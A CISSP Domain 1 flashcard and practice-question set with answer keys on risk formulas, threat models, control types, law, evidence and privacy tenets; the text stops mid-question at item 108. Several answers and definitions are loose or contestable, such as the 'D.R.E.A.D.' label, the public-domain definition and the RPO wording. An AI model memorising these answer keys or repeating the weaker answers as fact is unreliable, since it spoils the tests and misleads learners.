CISSP-P1 Flashcards

1
Q

The CIA triad stands for

A

Confidentiality Integrity Availability

2
Q

From a CIA perspective “Access Controls help ensure that only authorized subjects can access objects”

Confidentiality
Integrity
Availability

A

Confidentiality

3
Q

From a CIA perspective “Ensures that our data or system configurations are not modified without authorization”

Confidentiality
Integrity
Availability

A

Integrity

4
Q

From a CIA perspective “Authorized request for objects must be granted to subjects within a reasonable amount of time”

Confidentiality
Integrity
Availability

A

Availability

5
Q

The ISC2 code of ethics

P.A.P.A

A

Protect society, the commonwealth, the infrastructure
Act honorably, honestly, justly, responsibly and legally
Provide diligent and competent service to principals
Advance and protect the profession

6
Q

Out of these four levels of security policy development which one “offers recommendation”

Security procedures
Security guidelines
Security baselines
Acceptable use policy

A

Security guidelines

7
Q

Out of these four levels of security policy development which one offers “detailed step by step”

Security procedures
Security guidelines
Security baselines
Acceptable use policy

A

Security procedures

8
Q

Out of these four levels of security policy development which one “assigns roles and responsibilities”

Security procedures
Security guidelines
Security baselines
Acceptable use policy

A

Acceptable use policy

9
Q

Out of these four levels of security policy development which one “defines minimum levels”

Security procedures
Security guidelines
Security baselines
Acceptable use policy

A

Security baselines

10
Q

In security planning this plan is categorized as a “Midterm plan developed to provide more details on goals of the strategic plan (1 year)”

Strategic
Tactical
Operational

A

Tactical

11
Q

In security planning this plan is categorized as a “Long term, stable plan that should include a risk assessment (5 year with annual updates)”

Strategic
Tactical
Operational

A

Strategic

12
Q

In security planning this plan is categorized as a “Short term highly detailed plan based on the strategic and tactical plan”

Strategic
Tactical
Operational

A

Operational

13
Q

In the Response to risk category which one of these is defined as “Do nothing, and you must accept the risk and potential loss if threat occurs”.

Risk Rejection
Risk deterrence
Risk avoidance
Risk mitigation
Risk assignment
Risk acceptance

A

Risk acceptance

14
Q

In the Response to risk category which one of these is defined as “You do this by implementing a countermeasure and accepting the residual risk”.

Risk mitigation
Risk Rejection
Risk deterrence
Risk acceptance
Risk assignment

A

Risk mitigation

15
Q

In the Response to risk category which one of these is defined as “Transfer (assign) to a 3rd party, like by purchasing insurance against damage”.

Risk acceptance
Risk avoidance
Risk Rejection
Risk deterrence
Risk mitigation
Risk assignment

A

Risk assignment

16
Q

In the Response to risk category which one of these is “when cost of mitigating or accepting are higher than benefits of the service”.

Risk acceptance
Risk mitigation
Risk avoidance
Risk Rejection
Risk assignment
Risk deterrence

A

Risk avoidance

17
Q

In the Response to risk category which one of these is “Implementing deterrents to would-be violators of security and policy”.

Risk acceptance
Risk mitigation
Risk avoidance
Risk deterrence
Risk Rejection
Risk assignment

A

Risk deterrence

18
Q

In the Response to risk category which one of these is “An unacceptable possible response to risk is to reject risk or ignore risk”.

Risk acceptance
Risk mitigation
Risk avoidance
Risk deterrence
Risk assignment
Risk Rejection

A

Risk Rejection

19
Q

The Seven steps of the risk management framework (NIST 800-37)

People - Prepare or Procure?
Can - Classify or Categorize?
See - Select or Sort?
I - Influence or Implement?
Am - Authorize or Assess?
Always - Authorize or assess?
Monitoring- Monitor or Monitor?

A

Prepare
Categorize
Select
Implement
Assess
Authorize
Monitor

20
Q

This type of risk is the risk that remains even with all conceivable safeguards in place.

Residual Risk
Inherent Risk
Total Risk

A

Residual Risk

21
Q

This type of risk is newly identified risk not yet addressed with risk management strategies; the amount of risk that exists in the absence of controls

Residual Risk
Inherent Risk
Total Risk

A

Inherent Risk

22
Q

Types of risk

Residual = after controls implemented
Inherent = Before controls implemented
Total = Without controls

True
False

A

True

23
Q

This type of risk is the amount of risk an organization would face if no safeguards were implemented.

Residual Risk
Inherent Risk
Total Risk

A

Total Risk

24
Q

Residual = Before controls implemented
Inherent = Without controls
Total = after controls implemented

True
False

A

False

25
Q

Formula for total risk

A. Threats * Vulnerabilities * asset value
B. Threats * Vulnerabilities * ALE

A

A. Threats * Vulnerabilities * asset value

26
Q

Risk is defined as

A. risk = asset * vulnerability
B. risk = threat * vulnerability

A

B. risk = threat * vulnerability

27
Q

Which one of these risk analysis concepts “assigns a dollar value to evaluate effectiveness of countermeasures”? It is an objective measure.

Qualitative
Quantitative

A

Quantitative

28
Q

Risk analysis steps in quantitative risk analysis?

I - Inventory
IDENTIFIED - Identify
PEOPLE - Perform
ENJOYING - Estimate
RAMBUNCTIOUS - Research
PARTY - Perform

A

Inventory assets (AV)
Identify threats (calculate EF and SLE)
Perform a threat analysis (ARO)
Estimate the potential loss (ALE)
Research countermeasures for each threat
Perform a cost benefit analysis

29
Q

Which one of these risk analysis concepts “uses a scoring system to rank threats and effectiveness of countermeasures”? It is a subjective measure, as it involves opinions, and therefore less accurate.

Qualitative
Quantitative

A

Qualitative

30
Q

What is the Delphi technique?

A. Uses a scoring system to rank threats and effectiveness of countermeasures
B. Assigns a dollar value to evaluate effectiveness of countermeasures
C. Anonymous feedback and response process used to arrive at a consensus

A

C. Anonymous feedback and response process used to arrive at a consensus

31
Q

Threat agents are what cause threats by exploiting vulnerabilities

True
False

A

True
32
Q

In calculating risk this is defined as “Percentage of loss that an organization would experience if a specific asset were violated by a realized risk”

A

EF

33
Q

In calculating risk this “Represents the cost associated with a single realized risk against a specific asset.”

A

SLE

34
Q

Formula for SLE

A

AV X EF

35
Q

In calculating risk this is “the expected frequency with which a specific threat or risk will occur within a single year.”

A

ARO

36
Q

In calculating risk this is “the possible yearly cost of all instances of a specific realized threat against a specific asset.”

A

ALE

37
Q

Formula for ALE

A

SLE X ARO
38
Q

ALE example

Office bldg. = 200,000
Hurricane damage estimate 50%
Hurricane probability is one every ten years (10%)

(AV X EF = SLE) 200,000 X .50 = 100,000
(SLE X ARO = ALE) 100,000 X .10 = 10,000

True
False

A

True

39
Q

ALE example

Office bldg. = 200,000
Hurricane damage estimate 50%
Hurricane probability is one every ten years (10%)

(AV X EF = SLE) 200,000 X 50 = 10,000,000
(SLE X ARO = ALE) 10,000,000 X 10 = 100,000,000

True
False

A

False. Watch that decimal!

40
Q

In calculating risk a safeguard evaluation means that the security controls are cost effective.

ALE before safeguard - ALE after safeguard - annual cost of safeguard = value of the safeguard
ALE1 - ALE2 - ACS

True
False

A

True. The control cannot cost more than the value of the safeguard; is the safeguard cost effective?
41
Q

Threat model - S.T.R.I.D.E.

A

STRIDE - Microsoft threat modeling tool
Spoofing
Tampering
Repudiation - attacker can deny participation
Information disclosure
Denial of service
Elevation of privilege
42
Q

Threat model - At which stage of the PASTA model do we perform an “Attack Analysis”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Six: Attack Analysis

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

43
Q

Threat model - At which stage of the PASTA model do we “Decompose the Application”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Three: Decompose the Application

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

44
Q

Threat model - At which stage of the PASTA model do we “Define the Objectives”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage One: Define the Objectives

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

45
Q

Threat model - At which stage of the PASTA model do we “Define the Technical Scope”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Two: Define the Technical Scope

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

46
Q

Threat model - At which stage of the PASTA model do we “Analyze the Threats”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Four: Analyze the Threats

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

47
Q

Threat model - At which stage of the PASTA model do we perform a “Vulnerability Analysis”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Five: Vulnerability Analysis

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis

48
Q

Threat model - At which stage of the PASTA model do we perform a “Risk and Impact Analysis”?

Stage One
Stage Two
Stage Three
Stage Four
Stage Five
Stage Six
Stage Seven

A

Stage Seven: Risk and Impact Analysis

Stage One: Define the Objectives
Stage Two: Define the Technical Scope
Stage Three: Decompose the Application
Stage Four: Analyze the Threats
Stage Five: Vulnerability Analysis
Stage Six: Attack Analysis
Stage Seven: Risk and Impact Analysis
49
Q

Threat model - V.A.S.T.

Visual, Agile, Simple Threat

A

Memorize

50
Q

D.R.E.A.D.

Damage potential
Reproducibility
Exploitability
Affected users
Discoverability

A

Memorize

51
Q

Trike

A

Memorize: a requirements model

52
Q

COBIT 5 is based on five principles that are essential for the effective management and governance of enterprise IT

Principle 1: Meeting stakeholder needs
Principle 2: Covering the enterprise end to end
Principle 3: Applying a single integrated framework
Principle 4: Enabling a holistic approach
Principle 5: Separating governance from management

A

Memorize
53
Q

Access control types fall into one of three categories: administrative, technical, or physical. This control is implemented using software, hardware, or firmware that restricts logical access on an IT system. Examples include firewalls, routers, encryption, etc.

1. Administrative (also called directive)
2. Technical
3. Physical

A

Technical

54
Q

Access control types fall into one of three categories: administrative, technical, or physical. This control is implemented by creating and following organizational policy, procedure, or regulation. User training and awareness also fall into this category.

1. Administrative (also called directive)
2. Technical
3. Physical

A

Administrative (also called directive)

55
Q

Access control types fall into one of three categories: administrative, technical, or physical. This control is implemented with devices, such as locks, fences, gates, and security guards.

1. Administrative (also called directive)
2. Technical
3. Physical

A

Physical

56
Q

This type of access control prevents actions from occurring. It applies restrictions to what a potential user, either authorized or unauthorized, can do. An example of this control is a preemployment drug screening. It is designed to prevent an organization from hiring an employee who is using illegal drugs.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Preventive

57
Q

This type of access control sends alerts during or after a successful attack. Examples of this control are intrusion detection systems that send alerts after a successful attack, closed-circuit television cameras that alert guards to an intruder, and a building alarm system that is triggered by an intruder.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Detective

58
Q

This type of access control works by “correcting” a damaged system or process. This access control typically works hand in hand with detective access controls. Antivirus software has both components. First, the antivirus software runs a scan and uses its definition file to detect whether there is any software that matches its virus list. If it detects a virus, this control takes over and either places the suspicious software in quarantine or deletes it from the system.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Corrective

59
Q

This type of access control means that after a security incident has occurred, we may need to restore the functionality of the system and organization. This control means that the system must be restored, which involves reinstallation from OS media or image, data restored from backups, etc.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Recovery

60
Q

This type of access control deters users from performing certain actions on a system. One example is a “Beware of Dog” sign; a thief encountering two buildings, one with guard dogs and one without, is more likely to attack the building without guard dogs. Another example is large fines for drivers who speed. This control is a sanction policy that makes users understand that they will be fired if they are caught surfing illicit or illegal websites.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Deterrent

61
Q

This type of access control is an additional security control put in place to compensate for weaknesses in other controls.

Corrective
Preventive
Compensating
Detective
Deterrent
Recovery

A

Compensating
62
Q

This law pertains to those laws where the victim can be seen as society itself. While it might seem odd to consider society the victim when an individual is murdered, the goal of criminal law is to promote and maintain an orderly and law-abiding citizenry. This law can include penalties that remove an individual from society by incarceration or, in some extreme cases in some regions, death. The goals of this law are to deter crime and to punish offenders. Due to the severity of depriving criminals of either freedom or their lives, the burden of proof in criminal cases is beyond any reasonable doubt.

Civil law
Liability
Criminal law
Administrative law

A

Criminal law

63
Q

In addition to this law being a major legal system in the world, it also serves as a type of law within the common law legal system. Another term associated with this law is tort law, which deals with injury (loosely defined) resulting from someone violating their responsibility to provide a duty of care. Tort law is the primary component of this law, and it is the most significant source of lawsuits that seek damages. In the United States, the burden of proof in a criminal court is beyond a reasonable doubt, while the burden of proof in civil proceedings is the preponderance of the evidence. “Preponderance” means more likely than not. Satisfying the burden of proof requirement regarding the preponderance of the evidence in a civil matter is much easier than meeting the burden of proof requirement in criminal proceedings.

Civil law
Liability
Criminal law
Administrative law

A

Civil law

64
Q

This law, also known as regulatory law, is law enacted by government agencies. The executive branch (deriving from the Office of the President) enacts this law in the United States. Government-mandated compliance measures are these laws. Some examples of this law are FCC regulations, Health Insurance Portability and Accountability Act (HIPAA) security mandates, FDA regulations, and FAA regulations.

Civil law
Liability
Criminal law
Administrative law

A

Administrative law

65
Q

This is another important legal concept for information security professionals and their employers. Society has grown quite litigious over the years, and the question of whether an organization is legally liable for specific actions or inactions can prove costly. Questions of liability often turn into questions regarding potential negligence. When attempting to determine whether certain actions or inactions constitute negligence, the Prudent Man Rule is often applied.

Civil law
Liability
Criminal law
Administrative law

A

Liability

66
Q

This law is the first major piece of US cybercrime-specific legislation.

Copyright and the Digital Millennium Copyright Act
Federal Information Security Management Act (FISMA)
Federal Sentencing Guidelines
Computer Fraud and Abuse Act

A

Computer Fraud and Abuse Act

67
Q

This law provides punishment guidelines to help federal judges interpret computer crime laws.

Copyright and the Digital Millennium Copyright Act
Federal Information Security Management Act (FISMA)
Federal Sentencing Guidelines
Computer Fraud and Abuse Act

A

Federal Sentencing Guidelines

68
Q

This law required formal InfoSec operations for the federal government.

Copyright and the Digital Millennium Copyright Act
Federal Information Security Management Act (FISMA)
Federal Sentencing Guidelines
Computer Fraud and Abuse Act

A

Federal Information Security Management Act (FISMA)

69
Q

This law covers literary, musical and dramatic works.

Copyright and the Digital Millennium Copyright Act
Federal Information Security Management Act (FISMA)
Federal Sentencing Guidelines
Computer Fraud and Abuse Act

A

Copyright and the Digital Millennium Copyright Act
70
Q

This item is associated with marketing and allows for the creation of a brand in order to distinguish the source of products or services. A name, logo, symbol, or image represents the most common items. In the United States, there are two different symbols that are used by an individual or organization in order to protect distinctive marks.

Trade Secrets
Trademark
Licenses
Copyright
Patent

A

Trademark

71
Q

This item provides a monopoly to the holder regarding the right to use, make, or sell an invention for a period of time in exchange for the holder’s promise to make the invention public. During the life of this item the holder can, through the use of civil litigation, exclude others from leveraging the invention.

A

Patent

72
Q

This item represents a type of intellectual property that protects the form of expression in artistic, musical, or literary works and is typically denoted by the circled C symbol. Its purpose is to preclude unauthorized duplication, distribution, or modification of a creative work. Note that it is the form of expression that is protected, not the subject matter or ideas represented.

Trade Secrets
Trademark
Licenses
Copyright
Patent

A

Copyright

73
Q

These are a contract between a provider of software and the consumer. Though there are types of these that provide explicit permission for the consumer to do virtually anything with the software, including modifying it for use in another commercial product, most commercial ones of this type provide explicit limits on the use and distribution of the software. EULAs are an unusual form of contract because using the software typically constitutes contractual agreement, even though only a small minority of users read the lengthy EULA.

Trade Secrets
Trademark
Licenses
Copyright
Patent

A

Licenses

74
Q

These are business-proprietary information that is important to an organization’s ability to compete. The organization must exercise due care and due diligence in the protection of these artifacts. Noncompete and nondisclosure agreements are two of the most common protection methods used.

Trade Secrets
Trademark
Licenses
Copyright
Patent

A

Trade secrets

75
Q

4 types of licensing

Contractual
Shrink wrap
Click through
Cloud services

A

Memorize

76
Q

HIPAA
HITECH - Health Information Technology for Economic and Clinical Health
Gramm-Leach-Bliley Act
COPPA - Children’s Online Privacy Protection Act
ECPA - Electronic Communications Privacy Act
CALEA - Communications Assistance for Law Enforcement Act

A

Memorize

77
Q

Due care is doing what a reasonable person would do in a given situation. It is sometimes called the “prudent man” rule. The term is derived from “duty of care”; for example, parents have a duty to care for their children. Due diligence is the management of due care. Due care and due diligence are often confused; they are related, but there is a difference between them. Due care is informal, while due diligence follows a process. Think of due diligence as a step beyond due care. For example, expecting your staff to keep their systems patched means that you expect them to exercise due care, while verifying that your staff has patched their systems is an example of due diligence.

A

Memorize
78
Q

This type of evidence consists of tangible or physical objects. A knife or bloody glove might constitute real evidence in some traditional criminal proceedings.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Real evidence

79
Q

This type of evidence is testimony provided by witnesses regarding what they actually experienced through their five senses.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Direct evidence

80
Q

Circumstantial evidence serves to establish the circumstances related to particular points or other evidence.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Circumstantial evidence

81
Q

Corroborative evidence provides additional support for a fact that might have been called into question.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Corroborative evidence

82
Q

This type of evidence constitutes second-hand evidence. As opposed to direct evidence, which is witnessed using any of the five senses, this type involves indirect information.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Hearsay evidence

83
Q

This type of evidence consists of copies of original documents and oral descriptions. Computer-generated logs and documents might also constitute this type of evidence rather than best evidence.

Direct evidence
Hearsay evidence
Real evidence
Corroborative evidence
Circumstantial evidence
Secondary evidence

A

Secondary evidence

84
Q

A digital rights management solution can be used for:

Protection of intellectual property
Protection of digital real estate
Protection from digital squatting
Protection of digital assets

A

Protection of intellectual property
85
Q

Which of the following statements is not correct concerning contingencies?

The recovery time objective must be less than the maximum allowable downtime
The recovery point objective is not a preference
The maximum allowable downtime cannot be exceeded
The recovery time objective is a preference

A

The recovery point objective is not a preference

The Maximum Allowable Downtime (MAD), also known as the Maximum Tolerable Downtime (MTD) and the Maximum Allowable Outage (MAO), is the amount of time that the business can be disrupted before the organization dies. The Recovery Time Objective (RTO) is the target time set for recovering from an interruption. The Recovery Point Objective (RPO) is how much data can be lost before the organization dies.

86
Q

If 12 yachts are worth $5 million each, pro-rated slippage fees are $1,000 per year, and damage that can be incurred is $20,000 per boat, what does the value of 0.4% represent?

The Exposure Factor of a single loss in relation to the total of all asset values
The Annualized Loss Expectancy from the exposure factor of one asset
The exposure factor of an annualized loss expectancy
The Annualized rate of occurrence from a single loss in relation to the total of all assets

A

The Exposure Factor of a single loss in relation to the total of all asset values

This question is looking to see if you know the difference between AV, EF, ALE, ARO, and SLE in a non-standard context. EF in the context of the available choices would be 20K divided by 5 million, not 240,000 divided by 60 million. Try to ignore the additional information that was intentionally thrown into the options (“in relation to…”).

87
Q

The realization of a risk results in:

The exploitation of a vulnerability
The weakening in layers of defense
Any potential threats becoming stronger
The possible accumulation of weaknesses

A

The exploitation of a vulnerability

A vulnerability is a weakness, or lack of a safeguard. A safeguard is a control; a threat is something that can take advantage of the vulnerability.

88
Q

If a company has limited funding and assigns a single employee to be responsible for creating the security policy, standards, procedures, and to participate in source code writing, forensic investigations, and firewall requests, which of the following statements is most correct?

The company should consider separating some of the employee’s duties
The company is violating the principle of least privilege by giving the employee too many job duties
The employee should not have this many job duties unless they are clearly articulated in the job description
The employee should verify with management whether there are too many responsibilities

A

The employee should not have this many job duties unless they are clearly articulated in the job description.

Least privilege has to do with access. While the other responses are good, the MOST correct statement is that he shouldn’t have such duties unless they are articulated in his job description.

89
Q

Which of the following could be an issue with the business impact analysis?

User error issues
The BIA has many vulnerabilities that could be exploited by an administrative process
The asset values contained therein might be nominal values to one particular area
The analysis is ongoing and never viewed as complete by the business owners

A

The asset values contained therein might be nominal values to one particular area

Ideally the BIA will contain mostly accurate asset values rather than nominal values that one particular area of the business presumes.

90
Q

The difference between training and awareness is:

Training seeks to educate, awareness seeks to remind
Training is informal, awareness is semi-formal
Training helps change employee behavior, awareness prevents it
One is more formal than the other

A

Training seeks to educate, awareness seeks to remind

As presented in Domain 1, education is more formal, offered by an accredited organization, and results in a degree or certification. This can be through an accredited college or official training program. Training is semi-formal, typically offered by employers; it can be documented and tracked, occurs during employment, and may be required by law or industry/regulator policy. Awareness is the effort to make employees aware of security requirements. It is informal, unscheduled, not required, and consists of reminders and encouragement, typically in the form of email reminders, security posters, team meeting discussions, conference call presentations, in-person presentations and guest speaker presentations.

91
Q

The Wassenaar Agreement is primarily known for its position on what?

The import/export of encrypted files
The import/export of cryptographic software and hardware
The import/export of block cipher technology
The import/export of non-approved cryptosystems

A

The import/export of cryptographic software and hardware
92
Which of the following would be a violation of the ISC2 code of ethics? Monitoring contents of a hard drive from an executive manager you don’t like and who has bullied you in the past. You conduct this activity only after receiving explicit e-mail instructions from the chief information officer. Conducting dictionary attacks on competitor website accounts at work; this type of attack is documented as part of your job duties under the category of “ethical hacking activities” to conduct on your company’s website. Using a rainbow table to steal credentials from employees as part of internal penetration testing activities. While this activity is not explicitly stated in your job description, you are part of the pentest team, and management has directed you to perform this activity while your co-worker is out sick. Sniffing the internet activity conducted on your home router after you suspect that an unauthorized individual is connecting to it in order to stream movies online.
Conducting dictionary attacks on competitor website accounts at work; this type of attack is documented as part of your job duties under the category of “ethical hacking activities” to conduct on your company’s website. According to the ISC2 code of conduct, the (ISC)2 member is expected to do the following:  1. Protect society, the common good, necessary public trust and confidence, and the infrastructure. 2. Act honorably, honestly, justly, responsibly, and legally. 3. Provide diligent and competent service to principals. 4. Advance and protect the profession. If your activities are not authorized you would be violating the second and third tenets of the code of conduct (acting justly and legally responsible; providing diligent and competent service). Conducting dictionary attacks on competitor websites would violate these tenets (because it is not authorized by your job description).
93
Public domain software typically refers to which of the following? Free to use including any modifications but support and extra features are not free Download requires registration but the software can be used for any purpose Modifications are free to use, but extra support and use are not featured Free to download including any support, but features and modifications include installation
Free to use including any modifications but support and extra features are not free
94
What can executive management do with an identified risk?

Accept, transfer, avoid, protect according to the risk value
Mitigate, accept, transfer, abandon the activity
Transfer, postpone, avoid, mitigate to an acceptable level
Accept, ignore, transfer, verify its accuracy
Mitigate, accept, transfer, abandon the activity
“Abandon the activity” is the same as to avoid the risk. If you struggled with this question.
95
Which of the following is not a privacy law tenet?

Notification
Scope
Limitation
Accountability
Accountability
Accountability is not a tenet of privacy law; however, it does apply to data ownership responsibility.
96
A hacker gains access to a device on the network and is able to intercept transmissions, however the transmissions are encrypted. Which of the following is most likely a deterrent for the hacker?

The use of shielded twisted pair
Work factor in breaking the algorithm
The use of fiber optics
The difficulty of capturing packets
Work factor in breaking the algorithm
97
Which of the following statements is most true?

Education about security is the best way to change employee behavior
Non-Disclosure Agreements prevent employees from divulging sensitive information
Policy sets the foundation for the organizational culture
Procedures ensure that tasks are performed according to standards
Procedures ensure that tasks are performed according to standards
Knowledge needed: Candidates need to be aware of the difference between policies, standards, procedures, and guidelines.
Policy – should have the following components:
- High level overview of security strategy or goals
- Contains data classifications (confidential, sensitive, etc.)
- Type of access management (whether role-based, etc.)
- Expected user behavior with the entity’s IT systems and data
- High level personnel security practices, such as background checks
Standard – should have the following elements:
- Can come from statutory/administrative law, professional organizations, or industry groups
- Describes settings, expectations of performance, configurations, specific requirements
Guidelines – contain recommendations and suggestions, but they are not required.
Procedures – contain specific, repeatable steps; very task-oriented.
98
Alex is a security practitioner of a cloud services provider whose customers have selected NIST 800-53 as the security framework. During an internal review, Alex discovers that none of the security controls have been applied to the baseline configuration. Alex has observed:

That non-compliance could be occurring, and that due practice has not been achieved.
That the company could be liable under the prudent person rule.
That this is a potentially reportable security incident, and should be investigated or researched further.
That the company has not practiced due diligence.
That the company could be liable under the prudent person rule.
Explanation: This question may be especially challenging since it has multiple correct or incorrect answers, depending on how you interpret it. The best approach with questions like this is to rate each response according to which one would be better than the other. Whichever response has the better rating should be the answer you select.
Knowledge needed: Due diligence involves the research and preparation, whereas due care (aka “prudent person”) applies to the actions afterward. This would not constitute a security incident (however it could lead to a security incident). Not applying the selected security framework could make the company liable under the prudent person rule. There is no such thing as due practice.
99
Which of the following statements is correct concerning contingencies?

The recovery objectives overall must be stated in the policy
The recovery point objective must be more than the maximum allowable downtime
The recovery time objective must be less than the maximum allowable downtime
The recovery objectives overall must be decided by functional management
The recovery time objective must be less than the maximum allowable downtime
RTO is a preference; MAD cannot be exceeded, otherwise the business cannot continue.
100
Executive management publishes an official email that describes what could happen to an employee who willingly violates the information security policy. This email can most likely be considered:

A standard derived from policy
Part of training & awareness
A guideline rather than a procedure
A reminder to all employees
Part of training & awareness
Knowledge needed: Awareness is the effort to make employees aware of security requirements. It is informal, unscheduled, not required, and consists of reminders and encouragement, typically in the form of email reminders, security posters, team meeting discussions, conference call presentations, in-person presentations and guest speaker presentations.
Policy – should have the following components:
1. High level overview of security strategy or goals
2. Contains data classifications (confidential, sensitive, etc.)
3. Type of access management (whether role-based, etc.)
4. Expected user behavior with the entity’s IT systems and data
5. High level personnel security practices, such as background checks
Procedures contain specific, repeatable steps; very task-oriented.
Standards should have the following elements:
1. Can come from statutory/administrative law, professional organizations, or industry groups
2. Describes settings, expectations of performance, configurations, specific requirements
Guidelines – contain recommendations and suggestions, but they are not required.
101
Which of the following is most likely not something to use as input into a business impact analysis?

The results of a financial audit that are not current
A hybrid survey focused on both employee and customer varying opinions
An external survey focused on overly-negative customer opinions
An internal survey focused on overly-positive employee opinions
The results of a financial audit that are not current
The type of opinions is irrelevant when conducting surveys in a BIA. An old financial audit does not capture variances in the asset values, and thus would not be used as input for a BIA.
102
Which of the following would not be considered intellectual property?

Unreleased music
Unreleased movie script
Software source code
None of the above
None of the above
All of these are intellectual property.
103
Contingency operations are concerned with:

Ensuring that profits rendered from current activities continue without disruption
Ensuring that existing operations do not fail without appropriate safeguards
Ensuring that recovery objectives are met and set appropriately
Ensuring that the critical path continues despite or without disruption
Ensuring that the critical path continues despite or without disruption
Critical path is synonymous with mission criticality. Profits may or may not be part of the critical path. The other two options are not optimal because they are concerned with management decisions and recovery rather than continuity.
104
Which of the following is not a privacy law tenet?

The subject should be told at the time their data is collected or created
The data should be collected for a specific, legal, and ethical purpose
The data can be shared with others
The subject’s information should only be retained as long as it’s needed
The data can be shared with others
Explanation: This question may be especially challenging since it asks the question in a roundabout way. These questions are presented with statements like “which of the following is NOT”, which is misleading for those of us who are quick readers. The best approach with questions like this is to rephrase the question in your mind, and turn it into something like “all of these are good options EXCEPT” and then find the choice that doesn’t fit.
Knowledge needed: Dissemination refers to the tenet that data should not be shared with others. Here is the mnemonic to use that can help memorize the general privacy tenets presented in the Common Body of Knowledge, but keep in mind ISC2 has added the GDPR privacy tenets as well, which are slightly different. Here is the mnemonic for the general tenets: “PLS (please) Acquire or Reveal Some DoNuts”. These are intentionally out of order from your book(s) to make memorization easier:
1. Participation – the data subject should have the option to opt in or opt out.
2. Limitation – data can only be used for the purpose stated.
3. Scope – there must be a specific purpose (and it must be legal/ethical); the scope should be included in the notification.
4. Accuracy – the data must be as accurate as possible, and the data subject should be able to make corrections.
5. Retention – the data should be kept only as long as it’s needed.
6. Security – the custodian must protect the data.
7. Dissemination – the custodian must not share the data without notifying the data subject.
8. Notification – must notify the user that you’re collecting and creating their data before it’s used; should include purpose of use.
105
If twelve yachts are worth five million each with a slippage fee of $1,000 and can incur $20,000 of damage per disaster, what would $240,000 represent if disasters occur once every three years?

Exposure factor
Asset value
Cost of risk mitigation
Single loss expectancy
Single loss expectancy
Explanation: This question may be especially challenging since it contains irrelevant information. The best approach with questions like this is to take your time in reading the question and available responses a few times to identify the irrelevant information. This will help you to understand what the question is really asking.
Knowledge needed: Single loss expectancy is the correct answer since this is a dollar amount (20,000 x 12). The Risk Measurement Model from Domain 1 is outdated according to ISC2 and is based on a physical security model, but they are still holding tight to these concepts. Asset Value (AV) is of course the asset’s value; exposure factor (EF) is the percent of the asset that can be lost from a certain event; single loss expectancy (SLE) is the AV x the EF, measured in money; the annual rate of occurrence (ARO) is how many times in a year the event occurs, typically a decimal but it can be more; the annual loss expectancy (ALE) is the SLE x ARO, which shows how much the business is currently losing without implementing safeguards. If the safeguards are cheaper than the ALE, it’s best to implement the safeguards.
106
If social engineering is used to gain access to a restricted area, upon which an individual logs into a server but does not have sufficient permissions to access data, which statement is most true if the security settings log the user activity, send it to an appliance for analysis, and alert the information security officer of the activity?

The sensitive data has sufficient controls to protect it.
The alert is a compensating control in the absence of other controls.
The audit logs are administrative controls.
The audit logs are preventive controls.
The alert is a compensating control in the absence of other controls.
Compensating controls only exist in the absence of other, more efficient controls.
107
Marco works for the University of Law whose CIO requests information on how frequently earthquakes have occurred within the area so that a risk assessment can be performed. What metric should Marco present to the CIO as input for the risk assessment?

Exposure factor of earthquakes in the area
Exposure factor of earthquakes worldwide
The annualized rate of earthquake occurrence for the area
The annualized loss expectancy from any given local earthquake
The annualized rate of earthquake occurrence for the area
This question may be especially challenging since it takes concepts from the Common Body of Knowledge and applies them to a realistic scenario. The best approach with questions like this is to try and identify which concept you are being quizzed on, which you can do by reading both question and available options slowly. It may take several times before you fully understand what the question is asking. Try not to rush in the real exam, and be patient with yourself.
Knowledge needed: The Risk Measurement Model from Domain 1 is outdated according to ISC2 and is based on a physical security model, but they are still holding tight to these concepts. Asset Value (AV) is of course the asset’s value; exposure factor (EF) is the percent of the asset that can be lost from a certain event; single loss expectancy (SLE) is the AV x the EF, measured in money; the annual rate of occurrence (ARO) is how many times in a year the event occurs, typically a decimal but it can be more; the annual loss expectancy (ALE) is the SLE x ARO, which shows how much the business is currently losing without implementing safeguards. If the safeguards are cheaper than the ALE, it’s best to implement the safeguards.
108
A possible difference between a contractual mandate and a regulatory mandate is:

